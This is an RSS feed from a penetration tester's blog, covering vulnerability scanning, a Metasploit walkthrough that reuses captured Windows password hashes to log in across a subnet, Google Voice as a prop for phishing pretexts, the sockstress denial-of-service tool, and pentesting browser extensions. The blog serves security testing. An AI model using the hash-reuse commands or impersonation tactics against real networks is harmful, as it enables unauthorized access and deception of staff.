<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>HexEsec &#124; a pentester's view &#187; pentest</title>
	<atom:link href="http://hexesec.wordpress.com/tag/pentest/feed/" rel="self" type="application/rss+xml" />
	<link>http://hexesec.wordpress.com</link>
	<description>sudo apt-get install ... security?</description>
	<lastBuildDate>Wed, 16 Dec 2009 23:34:30 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='hexesec.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/92201dabe8b4987549fde15513466bfb?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>HexEsec &#124; a pentester's view &#187; pentest</title>
		<link>http://hexesec.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://hexesec.wordpress.com/osd.xml" title="HexEsec | a pentester&#8217;s view" />
		<item>
		<title>what should be considered a vulnerability?</title>
		<link>http://hexesec.wordpress.com/2009/12/15/what-should-be-considered-a-vulnerability/</link>
		<comments>http://hexesec.wordpress.com/2009/12/15/what-should-be-considered-a-vulnerability/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 10:53:20 +0000</pubDate>
		<dc:creator>jcran</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[automation]]></category>
		<category><![CDATA[nessus]]></category>
		<category><![CDATA[nexpose]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[scanner]]></category>
		<category><![CDATA[va]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://hexesec.wordpress.com/?p=309</guid>
		<description><![CDATA[&#8230;And now, a rant.
What should be considered (and reported) as a vulnerability when auditing a network?
Is weak network architecture? What if i can hit a critical server from an unprotected workstation? Isn&#8217;t that a vulnerability? Can we detect it?
What are today&#8217;s vulnerability scanners doing to detect bad management practices? Users w/ local administrator? Admins in [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=309&subd=hexesec&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>&#8230;And now, a rant.</p>
<p>What should be considered (and reported) as a vulnerability when auditing a network?</p>
<p>Is weak network architecture? What if i can hit a critical server from an unprotected workstation? Isn&#8217;t that a vulnerability? Can we detect it?</p>
<p>What are today&#8217;s vulnerability scanners doing to detect bad management practices? Users w/ local administrator? Admins in the same segment as untrusted contractors? Windows servers / workstations with the same password?</p>
<p>Isn&#8217;t that a vulnerability? (hint &#8211; pass-the-hash)</p>
<p>What are scanners doing to detect insufficient technical controls? In the face of current (phishing, malware, etc) threats, should lack of egress filtering and lack of a proxy be considered a vulnerability? Should automated tools be picking this up and pointing it out?</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hexesec.wordpress.com/309/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hexesec.wordpress.com/309/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hexesec.wordpress.com/309/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hexesec.wordpress.com/309/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hexesec.wordpress.com/309/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hexesec.wordpress.com/309/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hexesec.wordpress.com/309/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hexesec.wordpress.com/309/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hexesec.wordpress.com/309/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hexesec.wordpress.com/309/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=309&subd=hexesec&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://hexesec.wordpress.com/2009/12/15/what-should-be-considered-a-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/a7ddf41647a2dd583835558cdf11b280?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">jcran</media:title>
		</media:content>
	</item>
		<item>
		<title>owning a windows network</title>
		<link>http://hexesec.wordpress.com/2009/11/06/owning-a-windows-network/</link>
		<comments>http://hexesec.wordpress.com/2009/11/06/owning-a-windows-network/#comments</comments>
		<pubDate>Fri, 06 Nov 2009 15:56:26 +0000</pubDate>
		<dc:creator>jcran</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[credcollect]]></category>
		<category><![CDATA[hashes]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[msf]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pth]]></category>
		<category><![CDATA[tokens]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://hexesec.wordpress.com/2009/11/06/owning-a-windows-network/</guid>
		<description><![CDATA[so&#8230; you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check &#38; see which systems use the same hashes:
msf exploit(psexec) &#62; use scanner/smb/login
msf auxiliary(login) &#62; info
Name: SMB Login Check Scanner
Version: 0
License: Metasploit Framework License (BSD)
Provided by:
tebo &#60;tebo@attackresearch.com&#62;
Basic options:
Name       Current Setting  Required  [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=289&subd=hexesec&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>so&#8230; you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check &amp; see which systems use the same hashes:</p>
<blockquote><p>msf exploit(psexec) &gt; use scanner/smb/login<br />
msf auxiliary(login) &gt; info</p>
<p>Name: SMB Login Check Scanner<br />
Version: 0<br />
License: Metasploit Framework License (BSD)</p>
<p>Provided by:<br />
tebo &lt;tebo@attackresearch.com&gt;</p>
<p>Basic options:<br />
Name       Current Setting  Required  Description<br />
&#8212;-       &#8212;&#8212;&#8212;&#8212;&#8212;  &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;<br />
RHOSTS                      yes       The target address range or CIDR identifier<br />
RPORT      445              yes       Set the SMB service port<br />
SMBDomain  WORKGROUP        no        SMB Domain<br />
SMBPass                     no        SMB Password<br />
SMBUser    Administrator    no        SMB Username<br />
THREADS    1                yes       The number of concurrent threads</p>
<p>Description:<br />
This module will test a SMB login on a range of machines and report<br />
successful logins. If you have loaded a database plugin and<br />
connected to a database this module will record successful logins<br />
and hosts so you can track your access.</p>
<p>msf auxiliary(login) &gt; set RHOSTS 10.1.1.0/24<br />
RHOSTS =&gt; 10.1.1.0/24<br />
msf auxiliary(login) &gt; set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)<br />
SMBPass =&gt; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<br />
msf auxiliary(login) &gt; exploit<br />
[*] 10.1.1.6 &#8211; FAILED 0xc000006d &#8211; STATUS_LOGON_FAILURE<br />
[*] 10.1.1.21 &#8211; SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)<br />
[*] Recording successful SMB credentials for 10.1.1.21<br />
[*] 10.1.1.25 &#8211; SUCCESSFUL LOGIN (Windows 5.0)<br />
[*] Recording successful SMB credentials for 10.1.1.25<br />
[*] 10.1.1.29 &#8211; SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)<br />
[*] Recording successful SMB credentials for 10.1.1.29<br />
[*] 10.1.1.28 &#8211; SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)<br />
[*] Recording successful SMB credentials for 10.1.1.28<br />
[*] 10.1.1.31 &#8211; SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)</p></blockquote>
<p>To speed it up, set THREADS &gt; 1. Be careful not to set it too high:</p>
<blockquote><p>[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO &#8220;hosts&#8221; (&#8220;address&#8221;, &#8220;name&#8221;, &#8220;comm&#8221;, &#8220;os_lang&#8221;, &#8220;mac&#8221;, &#8220;os_sp&#8221;, &#8220;arch&#8221;, &#8220;os_flavor&#8221;, &#8220;address6&#8243;, &#8220;os_name&#8221;, &#8220;desc&#8221;, &#8220;created&#8221;, &#8220;state&#8221;) VALUES(&#8216;10.1.1.189&#8242;, NULL, &#8221;, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, &#8216;2009-11-06 10:48:09&#8242;, &#8216;unknown&#8217;)</p></blockquote>
<p>Thanks to <a href="http://www.attackresearch.com/">tebo</a> for the excellent work. Now, if only it worked with <a href="http://carnal0wnage.blogspot.com/2009/04/automatic-credential-collection-and.html">credcollect</a>.</p>
<div class="zemanta-pixie"><img class="zemanta-pixie-img" src="http://img.zemanta.com/pixy.gif?x-id=45a3b146-db14-8552-a6bc-68600ebbebba" alt="" /></div>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hexesec.wordpress.com/289/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hexesec.wordpress.com/289/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hexesec.wordpress.com/289/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hexesec.wordpress.com/289/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hexesec.wordpress.com/289/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hexesec.wordpress.com/289/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hexesec.wordpress.com/289/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hexesec.wordpress.com/289/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hexesec.wordpress.com/289/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hexesec.wordpress.com/289/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=289&subd=hexesec&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://hexesec.wordpress.com/2009/11/06/owning-a-windows-network/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/a7ddf41647a2dd583835558cdf11b280?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">jcran</media:title>
		</media:content>

		<media:content url="http://img.zemanta.com/pixy.gif?x-id=45a3b146-db14-8552-a6bc-68600ebbebba" medium="image" />
	</item>
		<item>
		<title>Google Voice (was Grand Central) is a pentester&#8217;s best friend</title>
		<link>http://hexesec.wordpress.com/2009/04/20/google-voice-was-grand-central-is-a-pentesters-best-friend/</link>
		<comments>http://hexesec.wordpress.com/2009/04/20/google-voice-was-grand-central-is-a-pentesters-best-friend/#comments</comments>
		<pubDate>Mon, 20 Apr 2009 22:47:14 +0000</pubDate>
		<dc:creator>jcran</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[tool]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[voicemail]]></category>

		<guid isPermaLink="false">http://hexesec.wordpress.com/2009/04/20/google-voice-was-grand-central-is-a-pentesters-best-friend/</guid>
		<description><![CDATA[Google Voice turns out to be really handy for phishing attacks. When you send out a phishing email, it&#8217;s useful to include a phone number, in case of any issues with the attachment, link or other payload.
Google voice gives you a (new, anonymous) number which you can route wherever you&#8217;d like (cell, office, etc). Additionally, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=182&subd=hexesec&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Google Voice turns out to be really handy for phishing attacks. When you send out a phishing email, it&#8217;s useful to include a phone number, in case of any issues with the attachment, link or other payload.</p>
<p>Google voice gives you a (new, anonymous) number which you can route wherever you&#8217;d like (cell, office, etc). Additionally, you can configure your voicemail to quickly impersonate the local admin, or security officer.</p>
<p>The killer feature, however, is the voicemail recording and transcription. Never again do you have to wade through a voice-driven mail system. Now, it simply dumps into your inbox for easy inclusion into a report. Additionally, you can download, email and share (via unique URI) voice messages.</p>
<p>Good for demonstrating that you can&#8217;t trust links AND phone numbers.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hexesec.wordpress.com/182/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hexesec.wordpress.com/182/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hexesec.wordpress.com/182/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hexesec.wordpress.com/182/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hexesec.wordpress.com/182/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hexesec.wordpress.com/182/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hexesec.wordpress.com/182/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hexesec.wordpress.com/182/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hexesec.wordpress.com/182/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hexesec.wordpress.com/182/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=182&subd=hexesec&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://hexesec.wordpress.com/2009/04/20/google-voice-was-grand-central-is-a-pentesters-best-friend/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/a7ddf41647a2dd583835558cdf11b280?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">jcran</media:title>
		</media:content>
	</item>
		<item>
		<title>New DOS attack technique: sockstress</title>
		<link>http://hexesec.wordpress.com/2008/10/01/new-dos-attack-technique-sockstress/</link>
		<comments>http://hexesec.wordpress.com/2008/10/01/new-dos-attack-technique-sockstress/#comments</comments>
		<pubDate>Wed, 01 Oct 2008 23:46:05 +0000</pubDate>
		<dc:creator>jcran</dc:creator>
				<category><![CDATA[attack]]></category>
		<category><![CDATA[tool]]></category>
		<category><![CDATA[dos]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://hexesec.wordpress.com/?p=108</guid>
		<description><![CDATA[The guys from outpost24 are releasing a new tool (sockstress) that exploits problems with TCP state tables. Apparently, you can disable most any windows/linux/firewall box with minimal attack bandwidth (read: cable modem).
According to the podcast,  the tool does &#8220;some evil things&#8221; during the negotiation of the handshake. It&#8217;s definitely not a SYN flood or a [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=108&subd=hexesec&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>The guys from <a href="http://www.outpost24.com/">outpost24</a> are releasing a new tool (<a href="http://blog.robertlee.name/2008/09/sockstress-podcast-interview.html">sockstress</a>) that exploits problems with TCP state tables. Apparently, you can disable most any windows/linux/firewall box with minimal attack bandwidth (read: cable modem).</p>
<p>According to the podcast,  the tool does &#8220;some evil things&#8221; during the negotiation of the handshake. It&#8217;s definitely not a SYN flood or a SYN cookie.</p>
<p>The attack uses a concept called &#8216;reverse <a href="http://en.wikipedia.org/wiki/SYN_cookies">SYN cookies</a>&#8216; to encode information about the client&#8217;s TCP session in the packets. This allows the attacker to attack without ever keeping track of state. The packets themselves keep track of state and what phase the attack is in.</p>
<p><em>Approximately 10 packets are needed to disable a single service. No system is known to withstand the attack.</em></p>
<p>The <a href="http://debeveiligingsupdate.nl/audio/bevupd_0003.mp3">podcast</a> is the best source of information at this point. (English starts after 5 mins)<br />
More information here:</p>
<ul>
<li><a href="http://www.t2.fi/2008/08/27/jack-c-louis-and-robert-e-lee-to-talk-about-new-dos-attack-vectors/">http://www.t2.fi/2008/08/27/jack-c-louis-and-robert-e-lee-to-talk-about-new-dos-attack-vectors/ </a></li>
<li><a href="http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1332898,00.html">http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1332898,00.html</a></li>
<li><a href="http://www.darkreading.com/blog.asp?blog_sectionid=403&amp;doc_id=164939">http://www.darkreading.com/blog.asp?blog_sectionid=403&amp;doc_id=164939</a></li>
</ul>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hexesec.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hexesec.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hexesec.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hexesec.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hexesec.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hexesec.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hexesec.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hexesec.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hexesec.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hexesec.wordpress.com/108/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=108&subd=hexesec&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://hexesec.wordpress.com/2008/10/01/new-dos-attack-technique-sockstress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
<enclosure url="http://debeveiligingsupdate.nl/audio/bevupd_0003.mp3" length="43176073" type="audio/mpeg" />
	
		<media:content url="http://0.gravatar.com/avatar/a7ddf41647a2dd583835558cdf11b280?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">jcran</media:title>
		</media:content>
	</item>
		<item>
		<title>Firefox Extensions Dump</title>
		<link>http://hexesec.wordpress.com/2008/09/23/firefox-extensions-dump/</link>
		<comments>http://hexesec.wordpress.com/2008/09/23/firefox-extensions-dump/#comments</comments>
		<pubDate>Tue, 23 Sep 2008 19:16:51 +0000</pubDate>
		<dc:creator>jcran</dc:creator>
				<category><![CDATA[attack]]></category>
		<category><![CDATA[list]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[tools]]></category>

		<guid isPermaLink="false">http://hexesec.wordpress.com/?p=92</guid>
		<description><![CDATA[This is a dump of my current set of Firefox extensions. Some of these are absolutely critical for pentesting: HackBar, TamperData, FireBug and ModifyHeaders. Some are not so critical, but helpful: Shazou (Geolocation), FormFox (See where forms submit to), PDF Download (yeah.), etc.
Aardvark &#8211; aardvark.xpi
Powerful and user-friendly selector utility for selecting elements and doing various [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hexesec.wordpress.com&blog=4149787&post=92&subd=hexesec&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>This is a dump of my current set of Firefox extensions. Some of these are absolutely critical for pentesting: HackBar, TamperData, FireBug and ModifyHeaders. Some are not so critical, but helpful: Shazou (Geolocation), FormFox (See where forms submit to), PDF Download (yeah.), etc.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/4111"><strong>Aardvark &#8211; aardvark.xpi</strong></a><br />
Powerful and user-friendly selector utility for selecting elements and doing various actions on them. It can be used for cleaning up a page prior to printing it (by removing and isolating elements), for making the page more readable, and (most appreciated by web developers), for analyzing the structure of a page.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/573"><strong>Add N Edit Cookies &#8211; add_n_edit_cookies-0.2.1.3-fx+mz.xpi</strong></a><br />
Cookie Editor that allows you add and edit &#8220;session&#8221; and saved cookies.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/2072"><strong>AS Number &#8211; asnumber-1.0beta9-fx.xpi</strong></a><br />
The AS Number Extension displays interesting information the Internet Service Provider of every website visited. Along with it come some additional statistics for those who want to know what happens behind the Webs shiny surface.</p>
<p><a href="http://www.bookburro.org/"><strong>Book Burro &#8211; bookburro.xpi</strong></a><br />
An extension for FireFox &amp; Flock web browsers to save you time and money when browsing books.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/1964"><strong>Cert Viewer Plus &#8211; cert_viewer_plus-1.4-fx+tb+sm.xpi</strong></a><br />
Certificate viewer enhancements: PEM format view, file export</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/4703"><strong>Cookie Monster &#8211; cookie_monster-0.94-fx.xpi</strong></a><br />
Cookie Monster features: &#8211; Temporary Permission for sites to leave cookies (permission removed and cookies deleted for site with temporary permission upon restart of Firefox) &#8211; New option to set general Firefox setting to block all cookies &#8211; Updated menu structure &#8211; Menu options to view cookies for current site or all sites &#8211; A panel indicating the current status of cookies for the current site and domain appears while hovering over the cookie status indicating icon in the status bar In a nutshell, Cookie Monster allows for easier managing of what sites a user allows to set cookies and what sites cannot. It works best for users who do NOT accept cookies by default, although this is not necessary.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/2497"><strong>Cookie Safe &#8211; cookiesafe-3.0.3-fx+tb+sm.xpi</strong></a><br />
This extension will allow you to easily control cookie permissions. It will appear on your statusbar. Just click on the icon to allow, block, or temporarily allow the site to set cookies. You can also view or clear the cookies and exceptions by&#8230;</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/1201"><strong>Cookie Watcher &#8211; cookie_watcher-0.7-fx.xpi</strong></a><br />
It is a simple extension. It helps testing web applications &#8211; it quickly can wipe &#8217;session&#8217; cookie or it helps to identify cluster node in clustered environments using cookie value.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/3615"><strong>Delicious Bookmarks &#8211; delicious_bookmarks-2.0.104-fx.xpi</strong></a><br />
Delicious Bookmarks is the official Firefox add-on for Delicious, the world&#8217;s leading social bookmarking service (formerly del.icio.us). It integrates your bookmarks and tags with Firefox and keeps them in sync for easy, convenient access.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/26"><strong>Download Statusbar &#8211; download_statusbar-0.9.6.3-fx.xpi</strong></a><br />
View and manage downloads from a tidy statusbar &#8211; without the download window getting in the way of your web browsing.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/4510"><strong>Edit Cookies &#8211; EditCookies.xpi</strong></a><br />
Edit your cookies right in Firefox!</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/1243"><strong>Extended Cookie Manager &#8211; extended_cookie_manager-0.9-fx.xpi</strong></a><br />
Easier cookie managment for Firefox</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/1269"><strong>FasterFox &#8211; Fasterfox{2.0.0}.xpi</strong></a><br />
Performance and network tweaks for Firefox</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/1843"><strong>FireBug &#8211; firebug-1.2.1-fx.xpi</strong></a><br />
Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/6683"><strong>FireCookie &#8211; firecookie-0.6-fx.xpi</strong></a><br />
Firecookie is an extension for Firebug that makes possible to view and manage cookies in your browser</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/5791"><strong>FlagFox &#8211; flagfox-3.3.1-fx.xpi</strong></a><br />
Displays a country flag depicting the location of the current website&#8217;s server and provides quick access to detailed location and webserver information.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/1579"><strong>FormFox &#8211; formfox-1.6.2-fx.xpi</strong></a><br />
Do you know where your form information is going? This extension displays the form action (the site to which the information you&#8217;ve entered is being sent.)</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/2464"><strong>FoxyProxy &#8211; foxyproxy-2.8.5-fx.xpi</strong></a><br />
FoxyProxy is an advanced proxy management tool that completely replaces Firefox&#8217;s limited proxying capabilities. It offers more features than SwitchProxy, ProxyButton, QuickProxy, xyzproxy, ProxyTex, TorButton, etc.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/748"><strong>GreaseMonkey &#8211; greasemonkey-0.8.20080609.0-fx.xpi</strong></a><br />
Allows you to customize the way a webpage displays using small bits of JavaScript. Hundreds of scripts, for a wide variety of popular sites, are already available at http://userscripts.org. You can write your own scripts, too. Check out http://wiki.greasespot.net/ to get started.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/3899"><strong>HackBar &#8211; hackbar-1.3.2-fx.xpi</strong></a><br />
Simple security audit / Penetration test tool.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/4276"><strong>HeaderSpy &#8211; HeaderSpy{1.2.2}.xpi</strong></a><br />
Shows HTTP headers on statusbar.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/8769"><strong>Hide Navigation Bar &#8211; hide_navigation_bar-1.2-fx.xpi</strong></a><br />
This extension enables you to hide the navigation bar through a toggle button. Currently the toggle button is the F2 key. You can change the key in the extensions options, as well as configure whether you want the Navigation Bar to be displayed on an initial Firefox launch. Also allows you to enable an Auto-Hide mode if you wish to use that instead.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/6647"><strong>HttpFox &#8211; httpfox-0.8.2-fx.xpi</strong></a><br />
An HTTP analyzer addon for Firefox</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/1419"><strong>IETab &#8211; ietab-1.5.20080618-addons</strong></a><br />
This is a great tool for web developers, since you can easily see how your web page displayed in IE with just one click and then switch back to Firefox.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/3863"><strong>IMacros For Firefox &#8211; imacros_for_firefox-6.0.7.5-fx+mz+sm.xpi</strong></a><br />
Automate Firefox. Record and replay repetitious work. If you love the Firefox web browser, but are tired of repetitive tasks like visiting the same sites every days, filling out forms, and remembering passwords, then iMacros for Firefox is the solution you’ve been dreaming of! ***Whatever you do with Firefox, iMacros can automate it.***</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/2076"><strong>JSView &#8211; jsview-2.0.5-fx+sm.xpi</strong></a><br />
ll browsers include a &#8220;View Source&#8221; option, but none of them offer the ability to view the source code of external files. Most websites store their javascripts and style sheets in external files and then link to them within a web page&#8217;s source code. Previously if you wanted to view the source code of an external javascript/stylesheet you would have to manually look through the source code to find the url and then type that into your browser.rnrnWell now there&#8217;s a much easier way.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/3829"><strong>Live HTTP Headers &#8211; live_http_headers-0.14-fx+sm.xpi</strong></a><br />
View HTTP headers of a page and while browsing.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/1731"><strong>Live IP Address &#8211; live_ip_address-1.82-fx.xpi</strong></a><br />
Retrieves your Live IP Address and displays it on Firefox&#8217;s status bar&#8230; Additional features: i) Easy copy of IP address to the clipboard, ii)Set update interval iii) Force update option</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/4014"><strong>LocationBar &#8211; Locationbar{0.9.1}.xpi</strong></a><br />
Puts emphasis on the domain to reduce spoofing risk. Linkifies URL segments (press Ctrl, Meta, Shift or Alt). More URL formatting options configurable.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/967"><strong>Modify Headers &#8211; modify_headers-0.6.4-fx+mz+sm.xpi</strong></a><br />
Add, modify and filter http request headers. You can modify the user agent string, add headers to spoof a mobile request (e.g. x-up-calling-line-id) and much more.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/722"><strong>NoScript &#8211; noscript-1.8.1.3-fx+mz+sm.xpi</strong></a><br />
The best security you can get in a web browser!<br />
Allow active content to run only from sites you trust, and protect yourself against XSS attacks.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/636"><strong>PDF Download &#8211; pdf_download-2.0.0.0-fx.xpi</strong></a><br />
Use PDF Download to do whatever you like with PDF files on the Web. Regain control of them and eliminate browser problems, view PDFs directly in Firefox as HTML, and use the all-new Web-to-PDF toolbar to save and share Web pages as high-quality PDF files.</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/2691"><strong>Poster &#8211; poster-1.7.1-fx.xpi</strong></a><br />
A developer tool for interacting with web services and other web resources that lets you make HTTP requests, set the entity body, and content type. This allows you to interact with web services and inspect the results&#8230;</p>
<p><a href="https://addons.mozilla.org/en-US/firefox/addon/953"><strong>RefControl &#8211; refcontrol-0.8.11-fx.xpi</strong></a><br />
Control what gets sent as the HTTP Referer on a per-site basis.</p>
